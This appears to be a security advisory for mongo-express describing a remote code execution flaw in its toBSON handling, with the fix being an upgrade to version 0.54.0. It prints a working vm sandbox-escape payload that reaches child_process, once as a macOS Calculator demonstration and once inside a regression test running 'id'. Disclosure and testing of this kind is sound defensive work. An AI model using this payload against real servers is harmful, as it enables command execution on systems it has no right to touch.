https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215
mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. The package misuses the vm dependency to evaluate user-supplied input, and vm does not provide a safe execution environment: code run inside it can reach the host process and execute commands.
Proof of concept (the macOS variant opens Calculator.app; the test variant runs `id`):

```js
// macOS variant of the payload:
// this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

// bson refers to mongo-express's own BSON helper module whose toBSON method is the affected endpoint's entry point
it('should not be executable', function () {
  const test = `
    this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
  `;
  // in a vulnerable version this evaluates the input and runs the command; a fixed version must not
  const result = bson.toBSON(test);
});
```
Upgrade mongo-express to version 0.54.0 or higher.
GitHub PR